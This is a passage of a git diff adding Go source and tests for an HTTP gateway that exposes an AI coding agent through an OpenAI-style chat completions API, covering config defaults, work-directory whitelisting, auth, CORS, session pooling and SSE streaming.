+	if cfg.ToolVisibility.Detail == "" {
+		cfg.ToolVisibility.Detail = "collapsed"
+	}
+	if cfg.SystemPromptMode == "" {
+		cfg.SystemPromptMode = "append"
+	}
+	if cfg.RequestTimeoutSecs <= 0 {
+		cfg.RequestTimeoutSecs = 1800
+	}
+}
+
+// SaveGatewayConfig writes the configuration to the given path.
+func SaveGatewayConfig(path string, cfg *GatewayConfig) error {
+	if err := os.MkdirAll(filepath.Dir(path), 0700); err != nil {
+		return fmt.Errorf("create config directory: %w", err)
+	}
+	data, err := json.MarshalIndent(cfg, "", "  ")
+	if err != nil {
+		return fmt.Errorf("marshal gateway config: %w", err)
+	}
+	return os.WriteFile(path, data, 0600)
+}
+
+// InitGatewayConfig creates the gateway.json template at the default location.
+// Returns the file path. If force is false and the file already exists, returns an error.
+func InitGatewayConfig(force bool) (string, error) {
+	path := GatewayConfigPath()
+	if !force {
+		if _, err := os.Stat(path); err == nil {
+			return path, fmt.Errorf("gateway.json already exists: %s", path)
+		}
+	}
+	cfg := DefaultGatewayConfig()
+	// Add example tokens and allowedWorkDirs for the template
+	cfg.Auth.Tokens = []string{"sk-change-me-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"}
+	home, _ := os.UserHomeDir()
+	if home == "" {
+		home = "/home/user"
+	}
+	exampleDirs := []string{filepath.Join(home, "projects")}
+	cfg.AllowedWorkDirs = &exampleDirs
+	cfg.WorkingDir = filepath.Join(home, "projects")
+
+	if err := SaveGatewayConfig(path, cfg); err != nil {
+		return "", err
+	}
+	return path, nil
+}
+
+// GetListenAddr returns the effective listen address.
+func (c *GatewayConfig) GetListenAddr() string {
+	if c.Listen != "" {
+		return c.Listen
+	}
+	return ":8080"
+}
+
+// GetWorkDir returns the effective working directory.
+func (c *GatewayConfig) GetWorkDir() string {
+	if c.WorkingDir != "" {
+		if strings.HasPrefix(c.WorkingDir, "~") {
+			home, _ := os.UserHomeDir()
+			if home != "" {
+				return filepath.Join(home, c.WorkingDir[1:])
+			}
+		}
+		return c.WorkingDir
+	}
+	cwd, _ := os.Getwd()
+	return cwd
+}
+
+// GetToolDetail returns the effective tool detail level.
+func (c *GatewayConfig) GetToolDetail() string {
+	if c.ToolVisibility.Detail != "" {
+		return c.ToolVisibility.Detail
+	}
+	return "collapsed"
+}
+
+// ValidateWorkDir checks if the given directory is allowed by the allowedWorkDirs whitelist.
+// Returns nil if allowed, an error describing the violation otherwise.
+func (c *GatewayConfig) ValidateWorkDir(dir string) error {
+	// nil AllowedWorkDirs = no restriction
+	if c.AllowedWorkDirs == nil {
+		return nil
+	}
+	allowed := *c.AllowedWorkDirs
+	// empty list = deny all overrides
+	if len(allowed) == 0 {
+		return fmt.Errorf("x_working_dir overrides are disabled")
+	}
+
+	cleanDir := filepath.Clean(dir)
+	for _, a := range allowed {
+		cleanAllowed := filepath.Clean(a)
+		if cleanDir == cleanAllowed {
+			return nil
+		}
+		// Prefix match with path separator boundary
+		prefix := cleanAllowed + string(filepath.Separator)
+		if strings.HasPrefix(cleanDir, prefix) {
+			return nil
+		}
+	}
+	return fmt.Errorf("directory %q is not in allowedWorkDirs", dir)
+}
diff --git a/internal/gateway/gateway.go b/internal/gateway/gateway.go
new file mode 100644
index 0000000..87af722
--- /dev/null
+++ b/internal/gateway/gateway.go
@@ -0,0 +1,307 @@
+package gateway
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"log"
+	"net/http"
+	"os"
+	"os/signal"
+	"path/filepath"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/contextfiles"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/skills"
+)
+
+// RunOptions holds the CLI flags for the gateway command.
+type RunOptions struct {
+	ConfigPath string
+	Port       string
+	Provider   string
+	Model      string
+	WorkDir    string
+	Sandbox    bool
+	MultiAgent bool
+	Verbose    bool
+	Debug      bool
+}
+
+// Server is the gateway HTTP server.
+type Server struct {
+	mu sync.RWMutex
+
+	cfg      *GatewayConfig
+	settings *config.Settings
+	version  string
+
+	provider   provider.Provider
+	model      *provider.Model
+	sandboxMgr *sandbox.Manager
+	skillsMgr  *skills.Manager
+	pool       *SessionPool
+
+	extraContext     string
+	defaultSessionID string // used when x_session_id is empty
+}
+
+// Run starts the gateway server.
+func Run(opts RunOptions, version string) error {
+	config.Verbose = opts.Verbose || opts.Debug
+	if opts.Debug {
+		_ = os.Setenv("VIBECODING_DEBUG", "1")
+	}
+
+	// Load settings.json
+	settings, err := config.LoadSettings()
+	if err != nil {
+		return fmt.Errorf("load settings: %w", err)
+	}
+
+	// Load gateway.json
+	var gCfg *GatewayConfig
+	if opts.ConfigPath != "" {
+		gCfg, err = LoadGatewayConfigFrom(opts.ConfigPath)
+	} else {
+		gCfg, err = LoadGatewayConfig()
+	}
+	if err != nil {
+		return fmt.Errorf("load gateway config: %w", err)
+	}
+
+	// CLI flag overrides
+	if opts.Port != "" {
+		gCfg.Listen = ":" + opts.Port
+	}
+	if opts.MultiAgent {
+		gCfg.EnableSubAgents = true
+	}
+	if opts.Sandbox {
+		gCfg.Sandbox.Enabled = true
+	}
+	if opts.WorkDir != "" {
+		gCfg.WorkingDir = opts.WorkDir
+	}
+
+	// Resolve provider/model
+	providerName := gCfg.Provider
+	if opts.Provider != "" {
+		providerName = opts.Provider
+	}
+	if providerName == "" {
+		providerName = settings.DefaultProvider
+	}
+
+	modelID := gCfg.Model
+	if opts.Model != "" {
+		modelID = opts.Model
+	}
+	if modelID == "" {
+		modelID = settings.DefaultModel
+	}
+
+	p, model, err := providerfactory.Create(settings, providerName, modelID)
+	if err != nil {
+		return fmt.Errorf("create provider: %w", err)
+	}
+
+	// Setup working directory
+	cwd := gCfg.GetWorkDir()
+
+	// Setup sandbox
+	sbMgr := sandbox.NewManager(cwd)
+	sbEnabled := gCfg.Sandbox.Enabled
+	if !sbEnabled {
+		sbMgr.SetLevel(sandbox.LevelNone)
+	} else {
+		level := sandbox.LevelStandard
+		if gCfg.Sandbox.Level != "" {
+			switch gCfg.Sandbox.Level {
+			case "none":
+				level = sandbox.LevelNone
+			case "strict":
+				level = sandbox.LevelStrict
+			default:
+				level = sandbox.LevelStandard
+			}
+		} else {
+			switch gCfg.DefaultMode {
+			case "plan":
+				level = sandbox.LevelStrict
+			case "yolo":
+				level = sandbox.LevelNone
+			}
+		}
+		if err := sbMgr.SetLevel(level); err != nil {
+			fmt.Fprintf(os.Stderr, "Warning: sandbox unavailable: %v\n", err)
+			sbMgr.SetLevel(sandbox.LevelNone)
+		}
+	}
+
+	// Load skills
+	skillsMgr := skills.NewManager(settings.GetGlobalSkillsDir(), filepath.Join(cwd, ".skills"))
+	_ = skillsMgr.Load()
+
+	// Load context files
+	var extraContext string
+	if settings.ContextFiles.Enabled {
+		cfResult := contextfiles.LoadContextFiles(cwd, config.ConfigDir(), settings.ContextFiles.ExtraFiles)
+		if ctx := contextfiles.BuildContextString(cfResult); ctx != "" {
+			extraContext = ctx
+		}
+	}
+	extraContext += skillsMgr.BuildAllSkillsContext()
+
+	// Build session pool
+	idleTimeout := time.Duration(gCfg.Session.IdleTimeoutSeconds) * time.Second
+	pool := NewSessionPool(gCfg.Session.MaxSessions, idleTimeout)
+
+	srv := &Server{
+		cfg:          gCfg,
+		settings:     settings,
+		version:      version,
+		provider:     p,
+		model:        model,
+		sandboxMgr:   sbMgr,
+		skillsMgr:    skillsMgr,
+		pool:         pool,
+		extraContext: extraContext,
+	}
+
+	// Build routes
+	mux := http.NewServeMux()
+	mux.HandleFunc("/v1/chat/completions", srv.handleChatCompletions)
+	mux.HandleFunc("/v1/models", srv.handleModels)
+	mux.HandleFunc("/health", srv.handleHealth)
+
+	// Apply middleware stack (inside-out)
+	var handler http.Handler = mux
+	handler = ConcurrencyMiddleware(gCfg.MaxConcurrentReqs, handler)
+	handler = CORSMiddleware(gCfg.CORS, handler)
+	handler = LoggingMiddleware(handler)
+
+	// Auth middleware wraps everything except /health
+	authMux := http.NewServeMux()
+	authMux.Handle("/health", LoggingMiddleware(http.HandlerFunc(srv.handleHealth)))
+	authMux.Handle("/", AuthMiddleware(gCfg.Auth, handler))
+
+	httpServer := &http.Server{
+		Addr:         gCfg.GetListenAddr(),
+		Handler:      authMux,
+		ReadTimeout:  30 * time.Second,
+		WriteTimeout: time.Duration(gCfg.RequestTimeoutSecs+10) * time.Second,
+		IdleTimeout:  120 * time.Second,
+	}
+
+	// Graceful shutdown
+	errCh := make(chan error, 1)
+	go func() {
+		fmt.Fprintf(os.Stderr, "VibeCoding Gateway v%s starting on %s\n", version, gCfg.GetListenAddr())
+		fmt.Fprintf(os.Stderr, "  Provider: %s | Model: %s | Mode: %s\n", p.Name(), model.ID, gCfg.DefaultMode)
+		fmt.Fprintf(os.Stderr, "  WorkDir: %s\n", cwd)
+		if gCfg.Auth.Enabled {
+			fmt.Fprintf(os.Stderr, "  Auth: enabled (%d tokens)\n", len(gCfg.Auth.Tokens))
+		} else {
+			fmt.Fprintf(os.Stderr, "  Auth: disabled\n")
+		}
+		if warning := gatewaySecurityWarning(gCfg); warning != "" {
+			fmt.Fprintf(os.Stderr, "  WARNING: %s\n", warning)
+		}
+		if gCfg.Sandbox.Enabled {
+			fmt.Fprintf(os.Stderr, "  Sandbox: enabled (level: %s)\n", gCfg.Sandbox.Level)
+		}
+		if gCfg.EnableSubAgents {
+			fmt.Fprintf(os.Stderr, "  Sub-Agents: enabled\n")
+		}
+		fmt.Fprintf(os.Stderr, "  Tool visibility: %s | System prompt: %s\n", gCfg.ToolVisibility.Mode, gCfg.SystemPromptMode)
+		fmt.Fprintf(os.Stderr, "\nReady to serve.\n")
+		errCh <- httpServer.ListenAndServe()
+	}()
+
+	// Wait for interrupt
+	sigCh := make(chan os.Signal, 1)
+	signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+
+	select {
+	case err := <-errCh:
+		if err != nil && err != http.ErrServerClosed {
+			return fmt.Errorf("server error: %w", err)
+		}
+	case sig := <-sigCh:
+		fmt.Fprintf(os.Stderr, "\nReceived %s, shutting down...\n", sig)
+		ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
+		defer cancel()
+		pool.Stop()
+		if err := httpServer.Shutdown(ctx); err != nil {
+			return fmt.Errorf("shutdown error: %w", err)
+		}
+	}
+
+	return nil
+}
+
+// LoggingMiddleware logs each request.
+func LoggingMiddleware(next http.Handler) http.Handler {
+	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		start := time.Now()
+		lw := &loggingResponseWriter{ResponseWriter: w, statusCode: http.StatusOK}
+		next.ServeHTTP(lw, r)
+		log.Printf("%s %s %d %s", r.Method, r.URL.Path, lw.statusCode, time.Since(start).Round(time.Millisecond))
+	})
+}
+
+type loggingResponseWriter struct {
+	http.ResponseWriter
+	statusCode int
+}
+
+func (lw *loggingResponseWriter) WriteHeader(code int) {
+	lw.statusCode = code
+	lw.ResponseWriter.WriteHeader(code)
+}
+
+// Ensure loggingResponseWriter also satisfies http.Flusher for SSE.
+func (lw *loggingResponseWriter) Flush() {
+	if f, ok := lw.ResponseWriter.(http.Flusher); ok {
+		f.Flush()
+	}
+}
+
+func gatewaySecurityWarning(cfg *GatewayConfig) string {
+	if cfg.Auth.Enabled || cfg.DefaultMode != "yolo" {
+		return ""
+	}
+	listen := cfg.Listen
+	if strings.HasPrefix(listen, ":") ||
+		strings.HasPrefix(listen, "0.0.0.0:") ||
+		strings.HasPrefix(listen, "[::]:") {
+		return "gateway is listening beyond loopback in yolo mode without authentication"
+	}
+	return ""
+}
+
+// --- Helpers ---
+
+func writeJSON(w http.ResponseWriter, status int, v any) {
+	w.Header().Set("Content-Type", "application/json")
+	w.WriteHeader(status)
+	json.NewEncoder(w).Encode(v)
+}
+
+func writeError(w http.ResponseWriter, status int, message, errType string) {
+	resp := ErrorResponse{
+		Error: ErrorDetail{
+			Message: message,
+			Type:    errType,
+		},
+	}
+	writeJSON(w, status, resp)
+}
diff --git a/internal/gateway/gateway_test.go b/internal/gateway/gateway_test.go
new file mode 100644
index 0000000..3d41a61
--- /dev/null
+++ b/internal/gateway/gateway_test.go
@@ -0,0 +1,1792 @@
+package gateway
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/skills"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// --- Config tests ---
+
+func TestDefaultGatewayConfig(t *testing.T) {
+	cfg := DefaultGatewayConfig()
+	if cfg.Listen != ":8080" {
+		t.Errorf("default listen = %q, want :8080", cfg.Listen)
+	}
+	if cfg.DefaultMode != "yolo" {
+		t.Errorf("default mode = %q, want yolo", cfg.DefaultMode)
+	}
+	if cfg.ToolVisibility.Mode != "content" {
+		t.Errorf("default tool visibility = %q, want content", cfg.ToolVisibility.Mode)
+	}
+	if cfg.SystemPromptMode != "append" {
+		t.Errorf("default system prompt mode = %q, want append", cfg.SystemPromptMode)
+	}
+	if cfg.RequestTimeoutSecs != 1800 {
+		t.Errorf("default timeout = %d, want 1800", cfg.RequestTimeoutSecs)
+	}
+	if cfg.Auth.Enabled {
+		t.Error("auth should be disabled by default")
+	}
+}
+
+func TestLoadGatewayConfig_Missing(t *testing.T) {
+	cfg, err := LoadGatewayConfigFrom("/nonexistent/path/gateway.json")
+	if err != nil {
+		t.Fatalf("unexpected error for missing config: %v", err)
+	}
+	if cfg.Listen != ":8080" {
+		t.Errorf("fallback listen = %q, want :8080", cfg.Listen)
+	}
+}
+
+func TestLoadGatewayConfig_Custom(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "gateway.json")
+	data := `{
+		"listen": ":9090",
+		"auth": {"enabled": true, "tokens": ["sk-test"]},
+		"defaultMode": "agent",
+		"toolVisibility": {"mode": "none"},
+		"systemPromptMode": "ignore",
+		"requestTimeoutSeconds": 600,
+		"maxConcurrentRequests": 10,
+		"allowedWorkDirs": ["/home/test"]
+	}`
+	os.WriteFile(path, []byte(data), 0644)
+
+	cfg, err := LoadGatewayConfigFrom(path)
+	if err != nil {
+		t.Fatalf("load error: %v", err)
+	}
+	if cfg.Listen != ":9090" {
+		t.Errorf("listen = %q, want :9090", cfg.Listen)
+	}
+	if !cfg.Auth.Enabled {
+		t.Error("auth should be enabled")
+	}
+	if len(cfg.Auth.Tokens) != 1 || cfg.Auth.Tokens[0] != "sk-test" {
+		t.Errorf("tokens = %v, want [sk-test]", cfg.Auth.Tokens)
+	}
+	if cfg.DefaultMode != "agent" {
+		t.Errorf("mode = %q, want agent", cfg.DefaultMode)
+	}
+	if cfg.ToolVisibility.Mode != "none" {
+		t.Errorf("tool vis = %q, want none", cfg.ToolVisibility.Mode)
+	}
+	if cfg.SystemPromptMode != "ignore" {
+		t.Errorf("sys prompt mode = %q, want ignore", cfg.SystemPromptMode)
+	}
+	if cfg.RequestTimeoutSecs != 600 {
+		t.Errorf("timeout = %d, want 600", cfg.RequestTimeoutSecs)
+	}
+	if cfg.MaxConcurrentReqs != 10 {
+		t.Errorf("max concurrent = %d, want 10", cfg.MaxConcurrentReqs)
+	}
+	if cfg.AllowedWorkDirs == nil || len(*cfg.AllowedWorkDirs) != 1 {
+		t.Error("expected 1 allowed work dir")
+	}
+}
+
+func TestValidateWorkDir(t *testing.T) {
+	tests := []struct {
+		name    string
+		allowed *[]string
+		dir     string
+		wantErr bool
+	}{
+		{"nil=no check", nil, "/any/path", false},
+		{"empty=deny all", &[]string{}, "/any/path", true},
+		{"exact match", &[]string{"/home/user/projects"}, "/home/user/projects", false},
+		{"prefix match", &[]string{"/home/user/projects"}, "/home/user/projects/foo", false},
+		{"evil prefix", &[]string{"/home/user/projects"}, "/home/user/projects-evil", true},
+		{"no match", &[]string{"/opt/repos"}, "/home/user/projects", true},
+		{"multi allowed", &[]string{"/opt/repos", "/home/user"}, "/home/user/foo", false},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			cfg := &GatewayConfig{AllowedWorkDirs: tt.allowed}
+			err := cfg.ValidateWorkDir(tt.dir)
+			if (err != nil) != tt.wantErr {
+				t.Errorf("ValidateWorkDir(%q) error = %v, wantErr = %v", tt.dir, err, tt.wantErr)
+			}
+		})
+	}
+}
+
+func TestSaveAndLoadGatewayConfig(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "gateway.json")
+	cfg := DefaultGatewayConfig()
+	if err := SaveGatewayConfig(path, cfg); err != nil {
+		t.Fatalf("save: %v", err)
+	}
+	loaded, err := LoadGatewayConfigFrom(path)
+	if err != nil {
+		t.Fatalf("reload: %v", err)
+	}
+	if loaded.Listen != ":8080" {
+		t.Errorf("reloaded listen = %q", loaded.Listen)
+	}
+}
+
+// --- Auth middleware tests ---
+
+func TestAuthMiddleware_Disabled(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: false}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+}
+
+func TestAuthMiddleware_ValidToken(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: true, Tokens: []string{"sk-test"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Bearer sk-test")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+}
+
+func TestAuthMiddleware_InvalidToken(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: true, Tokens: []string{"sk-test"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Authorization", "Bearer wrong-token")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("status = %d, want 401", w.Code)
+	}
+}
+
+func TestAuthMiddleware_MissingHeader(t *testing.T) {
+	handler := AuthMiddleware(AuthConfig{Enabled: true, Tokens: []string{"sk-test"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusUnauthorized {
+		t.Errorf("status = %d, want 401", w.Code)
+	}
+}
+
+// --- CORS middleware tests ---
+
+func TestCORSMiddleware_Enabled(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true, AllowOrigins: []string{"http://example.com"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "http://example.com" {
+		t.Errorf("CORS origin = %q, want http://example.com", got)
+	}
+}
+
+func TestCORSMiddleware_MultipleOriginsEchoesRequestOrigin(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true, AllowOrigins: []string{"http://a.example", "http://b.example"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Origin", "http://b.example")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "http://b.example" {
+		t.Errorf("CORS origin = %q, want http://b.example", got)
+	}
+}
+
+func TestCORSMiddleware_MultipleOriginsRejectsUnknownOrigin(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true, AllowOrigins: []string{"http://a.example", "http://b.example"}}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	req.Header.Set("Origin", "http://evil.example")
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if got := w.Header().Get("Access-Control-Allow-Origin"); got != "" {
+		t.Errorf("CORS origin = %q, want empty", got)
+	}
+}
+
+func TestCORSMiddleware_Preflight(t *testing.T) {
+	handler := CORSMiddleware(CORSConfig{Enabled: true}, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("OPTIONS", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusNoContent {
+		t.Errorf("status = %d, want 204", w.Code)
+	}
+}
+
+// --- Concurrency middleware tests ---
+
+func TestConcurrencyMiddleware_NoLimit(t *testing.T) {
+	handler := ConcurrencyMiddleware(0, http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		w.WriteHeader(http.StatusOK)
+	}))
+	req := httptest.NewRequest("GET", "/test", nil)
+	w := httptest.NewRecorder()
+	handler.ServeHTTP(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+}
+
+// --- SessionPool tests ---
+
+func TestSessionPool_PutGet(t *testing.T) {
+	pool := NewSessionPool(0, 0)
+	defer pool.Stop()
+
+	sess := &GatewaySession{ID: "sess-1", WorkDir: "/tmp", LastUsed: time.Now()}
+	if err := pool.Put(sess); err != nil {
+		t.Fatalf("put: %v", err)
+	}
+	got := pool.Get("sess-1")
+	if got == nil || got.ID != "sess-1" {
+		t.Error("expected to get session back")
+	}
+	if pool.Count() != 1 {
+		t.Errorf("count = %d, want 1", pool.Count())
+	}
+}
+
+func TestSessionPool_MaxSessions(t *testing.T) {
+	pool := NewSessionPool(1, 0)
+	defer pool.Stop()
+
+	sess1 := &GatewaySession{ID: "sess-1", LastUsed: time.Now()}
+	if err := pool.Put(sess1); err != nil {
+		t.Fatalf("put 1: %v", err)
+	}
+	sess2 := &GatewaySession{ID: "sess-2", LastUsed: time.Now()}
+	if err := pool.Put(sess2); err == nil {
+		t.Error("expected pool full error")
+	}
+}
+
+func TestSessionPool_Remove(t *testing.T) {
+	pool := NewSessionPool(0, 0)
+	defer pool.Stop()
+
+	pool.Put(&GatewaySession{ID: "sess-1", LastUsed: time.Now()})
+	pool.Remove("sess-1")
+	if pool.Get("sess-1") != nil {
+		t.Error("session should be removed")
+	}
+}
+
+func TestSessionPool_List(t *testing.T) {
+	pool := NewSessionPool(0, 0)
+	defer pool.Stop()
+
+	pool.Put(&GatewaySession{ID: "a", LastUsed: time.Now()})
+	pool.Put(&GatewaySession{ID: "b", LastUsed: time.Now()})
+	ids := pool.List()
+	if len(ids) != 2 {
+		t.Errorf("list len = %d, want 2", len(ids))
+	}
+}
+
+// --- parseMessages tests ---
+
+func TestParseMessages(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "system", Content: "you are helpful"},
+		{Role: "user", Content: "hello"},
+		{Role: "assistant", Content: "hi there"},
+		{Role: "user", Content: "explain main.go"},
+	}
+	lastUser, sysMsgs, history := parseMessages(msgs)
+	if lastUser != "explain main.go" {
+		t.Errorf("lastUser = %q", lastUser)
+	}
+	if len(sysMsgs) != 1 || sysMsgs[0] != "you are helpful" {
+		t.Errorf("sysMsgs = %v", sysMsgs)
+	}
+	if len(history) != 2 { // "hello" and "hi there"
+		t.Errorf("history len = %d, want 2", len(history))
+	}
+}
+
+func TestParseMessages_NoUser(t *testing.T) {
+	msgs := []RequestMessage{
+		{Role: "system", Content: "test"},
+	}
+	lastUser, _, _ := parseMessages(msgs)
+	if lastUser != "" {
+		t.Errorf("expected empty lastUser, got %q", lastUser)
+	}
+}
+
+// --- SSE writer tests ---
+
+func TestSSEWriter_ContentDelta(t *testing.T) {
+	w := httptest.NewRecorder()
+	sse := NewSSEWriter(w, "test-model", "sess-1")
+	sse.WriteContentDelta("hello")
+	body := w.Body.String()
+	if !strings.Contains(body, `"content":"hello"`) {
+		t.Errorf("body doesn't contain content delta: %s", body)
+	}
+	if !strings.HasPrefix(body, "data: ") {
+		t.Error("SSE data should start with 'data: '")
+	}
+}
+
+func TestSSEWriter_Done(t *testing.T) {
+	w := httptest.NewRecorder()
+	sse := NewSSEWriter(w, "test-model", "sess-1")
+	sse.WriteDone(&CompletionUsage{PromptTokens: 100, CompletionTokens: 50, TotalTokens: 150})
+	body := w.Body.String()
+	if !strings.Contains(body, `"finish_reason":"stop"`) {
+		t.Errorf("missing finish_reason: %s", body)
+	}
+	if !strings.Contains(body, "[DONE]") {
+		t.Error("missing [DONE] sentinel")
+	}
+}
+
+func TestSSEWriter_ToolStatusContent(t *testing.T) {
+	w := httptest.NewRecorder()
+	sse := NewSSEWriter(w, "test-model", "")
+	sse.WriteToolStatusContent("🔧 [read] main.go", "running")
+	body := w.Body.String()
+	if !strings.Contains(body, "[running]") {
+		t.Errorf("missing status in content: %s", body)
+	}
+	if !strings.Contains(body, "read") {
+		t.Errorf("missing tool name in content: %s", body)
+	}
+}
+
+func TestSSEWriter_ToolStatusEvent(t *testing.T) {
+	w := httptest.NewRecorder()
+	sse := NewSSEWriter(w, "test-model", "")
+	sse.WriteToolStatusEvent("bash", "running", map[string]any{"command": "ls"})
+	body := w.Body.String()
+	if !strings.Contains(body, "event: tool_status") {
+		t.Errorf("missing tool_status event: %s", body)
+	}
+	if !strings.Contains(body, `"tool":"bash"`) {
+		t.Errorf("missing tool name: %s", body)
+	}
+}
+
+// --- writeError / writeJSON tests ---
+
+func TestWriteError(t *testing.T) {
+	w := httptest.NewRecorder()
+	writeError(w, http.StatusBadRequest, "bad input", "invalid_request_error")
+	if w.Code != http.StatusBadRequest {
+		t.Errorf("status = %d, want 400", w.Code)
+	}
+	var resp ErrorResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Error.Message != "bad input" {
+		t.Errorf("error message = %q", resp.Error.Message)
+	}
+}
+
+// --- Health handler test ---
+
+func TestHealthHandler(t *testing.T) {
+	srv := &Server{
+		version: "test",
+		pool:    NewSessionPool(0, 0),
+	}
+	defer srv.pool.Stop()
+
+	req := httptest.NewRequest("GET", "/health", nil)
+	w := httptest.NewRecorder()
+	srv.handleHealth(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+	var resp HealthResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Status != "ok" {
+		t.Errorf("status = %q", resp.Status)
+	}
+	if resp.Version != "test" {
+		t.Errorf("version = %q", resp.Version)
+	}
+}
+
+// --- Models handler test ---
+
+func TestModelsHandler(t *testing.T) {
+	mockP := provider.NewMockProvider("test", []*provider.Model{
+		{ID: "m1", Name: "Model 1"},
+		{ID: "m2", Name: "Model 2"},
+	}, nil)
+	srv := &Server{
+		provider: mockP,
+	}
+	req := httptest.NewRequest("GET", "/v1/models", nil)
+	w := httptest.NewRecorder()
+	srv.handleModels(w, req)
+	if w.Code != http.StatusOK {
+		t.Errorf("status = %d, want 200", w.Code)
+	}
+	var resp ModelListResponse
+	json.NewDecoder(w.Body).Decode(&resp)
+	if resp.Object != "list" {
+		t.Errorf("object = %q", resp.Object)
+	}
+	if len(resp.Data) != 2 {
+		t.Errorf("models = %d, want 2", len(resp.Data))
+	}
+}
+
+// --- Chat handler slash command test ---
+
+func newTestServer(t *testing.T) *Server {
+	t.Helper()
+	cwd := t.TempDir()
+	models := []*provider.Model{
+		{ID: "m1", Name: "Model 1"},
+	}
+	mockP := provider.NewMockProvider("test", models, nil)
+
+	settings := config.DefaultSettings()
+	settings.SessionDir = filepath.Join(cwd, "sessions")
+
+	sbMgr := sandbox.NewManager(cwd)
+	sbMgr.SetLevel(sandbox.LevelNone)
+
+	skillsMgr := skills.NewManager(filepath.Join(cwd, "skills-global"), filepath.Join(cwd, "skills-project"))
+
+	pool := NewSessionPool(0, 0)
+
+	return &Server{
+		cfg:        DefaultGatewayConfig(),
+		settings:   settings,
+		version:    "test",
+		provider:   mockP,
+		model:      models[0],
+		sandboxMgr: sbMgr,
+		skillsMgr:  skillsMgr,
+		pool:       pool,
+	}
+}
+
+func TestCloneModelCopiesMutableFields(t *testing.T) {
+	model := &provider.Model{
+		ID:     "m1",
+		Input:  []string{"text"},
+		Compat: &provider.ModelCompat{ThinkingFormat: "anthropic"},
+	}
+
+	clone := cloneModel(model)
+	clone.Input[0] = "image"
+	clone.Compat.ThinkingFormat = "deepseek"
+
+	if model.Input[0] != "text" {
+		t.Fatalf("original input mutated: %v", model.Input)
+	}
+	if model.Compat.ThinkingFormat != "anthropic" {
+		t.Fatalf("original compat mutated: %s", model.Compat.ThinkingFormat)
+	}
+}
+
+func TestChatHandler_SlashHelp(t *testing.T) {
+	srv := newTestServer(t)
+	defer srv.pool.Stop()
+
